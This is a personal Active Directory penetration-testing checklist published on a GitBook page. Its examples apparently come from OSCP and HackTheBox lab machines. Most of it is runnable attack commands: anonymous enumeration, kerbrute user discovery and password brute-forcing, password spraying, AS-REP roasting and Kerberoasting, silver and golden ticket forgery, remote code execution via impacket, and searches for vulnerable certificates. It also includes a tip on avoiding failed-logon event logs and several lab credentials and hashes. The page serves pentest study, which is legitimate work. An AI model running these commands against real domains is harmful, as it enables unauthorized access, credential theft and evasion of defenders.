🎄Active Directory Checklist
👩‍✈️Active Directory Commands
⛓️Scenarios

Powered by GitBook

On this page

Unauthenticated
Authenticated

Active Directory Checklist

Checklist for my sanity

Unauthenticated

Unauthenticated
- Get Hostnames
  nxc smb 192.168.209.1
  Use nslookup with server set to DC/NS server and ask for localhost or ip
  nslookup ; server <DC/NS server> ; <IP>
  run dnsrecon on the subnet dnsrecon -d <domain> -r <ip range>
- Setup /etc/hosts
  nxc smb [IP]
  Alternatively add the name server to /etc/resolv.conf
- Sync time for kerberos if lapse
  sudo ntpdate [IP]
  `sudo rdate -n [IP]
- Nmap TCP scan
  Host identification
  sudo nmap -T4 -p 21,22,23,25,53,69,80,81,88,110,111,119,123,137-139,161,389,443,445,465,500,512-513,548,587,623-624,993-995,1099,11211,1241,1433-1434,1521,1723,2049,2483-2484,27017-27019,3268-3269,3306,3389,4333,4786,4848,5060-5061,5432,5800,5900-5901,5985-5986,6000-6001,7001,8000,8080,8181,8443,10000,16992-16993,32764 -v 172.16.1.0/24 -oA scans/nmap-pulse-172.16.1.0
  cat scans/nmap-pulse-172.16.1.0.gnmap|grep ': Up'|cut -d ' ' -f2 > active_hosts
  [ ]
  sudo nmap -sV -sC -oA scans/nmap-tcp-initial -v
  sudo nmap -sV -sC -oA scans/nmap-tcp-full -p- -v Tip: If DC make sure time is correct for kerberos port
  Use nslookup with server set to DC/NS server and ask for localhost or ip. If ipv6 addr found;
  nmap -6 [ipv6]
- Nmap UDP scan
  sudo nmap -sU -p 53,69,111,161,500,623,2049 --open -oA scans/nmap-udp -iL targets.txt
- Get Domain Info
  ldapsearch -x -H ldap://<ip> -s base namingcontexts
  ldapsearch -x -H ldap://10.129.53.189 -b 'dc=egotistical-bank,dc=local' -s sub '*'
  nxc smb resolute -u '' -p '' --pass-pol
- Dump AD Users (DC)
  nxc smb 192.168.209.1 -u '' -p '' --users
  nxc ldap resolute -u '' -p '' -M user-desc
  rpcclient -U '' 10.129.96.155
  enumdomusers
  querydispinfo
  ldapsearch -LLL -x -H ldap://192.168.129.100 -b 'oscp.exam' -s sub '(objectclass=person)' '*'|grep -i samaccountname|cut -d ':' -f 2|sed 's/ //g'>>users Tip: Did you get all users? Remember svc-alfresco?
  impacket-GetADUsers -dc-ip 10.129.227.113 -dc-host dc01 "timelapse.htb/" -all -debug Tip: if you are able to dump users, read through the output to look for plain text passwords in the description column. Also try Asreproasting And brute-forcing
- Enumerate anonymous/null file shares
  nxc smb 192.168.209.1 -u '' -p '' --shares
  nxc smb 192.168.209.1 -u 'a' -p '' --shares | tee scans/nxc-anon-shares.log
  smbclient -L //192.168.209.1
  smbmap -d megabank.local -u '' -H resolute -r --depth 20|tee scans/smbmap-anon-recursive.log
  smbmap -d megabank.local -u 'a' -H resolute -r --depth 20|tee scans/smbmap-anon-recursive.log
  smbmap -d cascade.local -H casc-dc1 -r --depth 20 -A '(html|vbs|ps1|txt|log|xml|reg|config|bak|ini|sh|bat|json|yml|yaml|sql|php|asp|aspx|jsp|jspx|cer|key|pem|p12|pfx|crt|conf|cfg|md|htpasswd|gitignore|dockerfile|db)'
  Check files closely with exiftool and strings
  Mount shares and test writability
- Users accounts
  Enumerate Users
  ~/Documents/loadables/tools/kerbrute userenum -d htb.local --dc rabbit /usr/share/wordlists/seclists/Usernames/xato-net-10-million-usernames-dup.txt -t 500
  nmap -p 88 --script=krb5-enum-users --script-args krb5-enum-users.realm='oscp.exam',userdb=/usr/share/wordlists/seclists/Usernames/Names/names.txt -Pn 192.168.129.100
  Enumerate from files found with exif tool
  Brute-force Accounts
  nxc ldap monteverde -u users -p users --no-bruteforce Tip: try this first
  Create a word list from a user dump
  hashcat users -r /usr/share/hashcat/rules/best64.rule -r /usr/share/hashcat/rules/leetspeak.rule --stdout > pguesses Tip: you could add months and seasons to this. NSA rules are really good.
  nxc ldap monteverde -u users -p users
  kerbrute bruteuser -d oscp.exam --dc dc01 /usr/share/wordlists/fasttrack.txt --verbose lisa Tip: Doesn't create event code 4624 to indicate a failed password
  cat users | xargs -t -I USR ~/loadables/tools/kerbrute bruteuser --dc resolute -d megabank.local -t 200 /usr/share/wordlists/seclists/Passwords/Default-Credentials/default-passwords.txt --verbose USR Check all accounts against the users we found user = user pass = user
- ASRepRoast
  (&(&(&(objectCategory=person)(objectClass=user)(userAccountControl:1.2.840.113556.1.4.803:=4194304))))
  nxc ldap [DC IP] -u users -p '' --asreproast hashes/asreproast.hash
  impacket-GetNPUsers -dc-ip sauna -request -usersfile users -outputfile hashes/asreproast.hash 'egotisticalbank/'

Authenticated

Tip: If authenticated, vpn could be switched to VM Win host to make life easier for certain attacks.

Authenticated
- Shares/Policy
  nxc smb hathor -u users -p passwords -k -d windcorp.htb -M spider_plus -o DOWNLOAD_FLAG=True OUTPUT_FOLDER=finds
  smbmap -d <domain> -u melanie -p 'Welcome123!' -H resolute -r --depth 20
  smbmap -d cascade.local -u 'r.thompson' -p rY4n5eva -H casc-dc1 -r --depth 20 -A '(html|vbs|ps1|txt|log|xml|reg|config|bak|ini|sh|bat|json|yml|yaml|sql|php|asp|aspx|jsp|jspx|cer|key|pem|p12|pfx|crt|conf|cfg|md|htpasswd|gitignore|dockerfile|db)'
  Check files closely with exiftool and strings
  Use dnspy to decompile fishy exec files
  sniff traffic of exec files
- Kerberoast
  (&(samAccountType=805306368)(servicePrincipalName=*)(!samAccountName=krbtgt)(!(UserAccountControl:1.2.840.113556.1.4.803:=2)))
  nxc ldap 192.168.0.104 -u harry -p pass --kerberoasting hashes/kerbroast
  impacket-GetUserSPNs -request -dc-ip 10.129.249.79 -target-domain active.htb active.htb/svc_tgs
- Bloodhound / ldapsearch / AD Users
  bloodhound-python -u 'ldap' -c all -d support.htb -ns 10.129.239.21 -p 'pass' --dns-tcp
  Set Objects as owned as you go
  Look for GenericAll Privileges given direct or thorough groups. Use the Outbound object control to view these privileges.
  Sharphound.exe -c all -d active.htb --domaincontroller 10.10.10.100 Tip: Run this from a runas netonly after grabbing a ticket with dir whackwhack dcip
  nxc ldap <ip> -u user -p pass --bloodhound -ns <ns-ip> --collection All Tip: Make sure ~/.nxc/nxc.conf is configured. THIS DOESNT WORK FOR ME
  ldapdomaindump -u 'support.htb\ldap' -p $(cat ../passwords) --no-json --no-grep -r dc
  ldapsearch -H ldap://support.htb -b 'dc=support,dc=htb' -D 'ldap@support.htb' -w 'pass' -s sub '(objectclass=user)' 'info' 'description' Tip: Use 'star' and look at ALL fields for users. Info and Description especially
  ldapsearch -H ldap://dc1 -b 'dc=scrm,dc=local' -U 'ksimpson' -W -s sub '(objectclass=user)' 'memberof'
  Analyze full domain dump for anomalies
  cat domain.ldif|awk '{print $1}'|sort | uniq -c | sort -nr
  Dump AD Users (DC)
  nxc ldap dc -u ldap -p passwords --users
- Silver Ticket
  Need NTLM hash of password
  python3 -c "import hashlib;r=hashlib.new('md4','REGGIE1234ronnie'.encode('utf-16le')).digest().hex();print(r)"
  Need domain SID
  nxc ldap DC1.scrm.local -u sqlsvc -p Pegasus60 -k --get-sid
  Get-ADDomain
  impacket-getPac -targetUser administrator scrm.local/ksimpson:ksimpson
  [ ]
  impacket-ticketer -nthash b999a16500b87d17ec7f2e2a68778f05 -domain-sid S-1-5-21-2743207045-1827831105-2542523200 -domain scrm.local -spn MSSQLSvc/dc1.scrm.local administrator Tip: invalid spn throws ioc to blues. Try hard
  export KRB5CCNAME=<TGS_ccache_file>
  impacket-psexec <domain_name>/<user_name>@<remote_hostname> -k -no-pass
  impacket-smbexec <domain_name>/<user_name>@<remote_hostname> -k -no-pass
  impacket-wmiexec <domain_name>/<user_name>@<remote_hostname> -k -no-pass
  impacket-mssqlclient <domain_name>/<user_name>@<remote_hostname> -k -no-pass
- Password Spray Tip: New passwords found are worth a spray
  ~/Documents/loadables/tools/kerbrute passwordspray -d search.htb --dc research -t 500 users '@3ONEmillionbaby'
  nxc ldap research -u users -p '@3ONEmillionbaby' --continue-on-success
- Golden Ticket Forgery CVE-2014-6324
  impacket-goldenPac htb.local/james:'J@m3s_P@ssW0rd!'@mantis
- Can you change passwords?
  rpcclient $> setuserinfo2 audit2020 23 'ASDqwe123'
- Is this a Certificate Authority with vulnerable cert? https://book.hacktricks.xyz/windows-hardening/active-directory-methodology/ad-certificates/domain-escalation
  certipy-ad find -vulnerable -dc-ip 10.129.228.253 -enabled -u ryan.cooper@sequel.htb -p NuclearMosquito3 Tip: https://github.com/ly4k/Certipy

NextActive Directory Commands

Last updated 10 months ago

🎄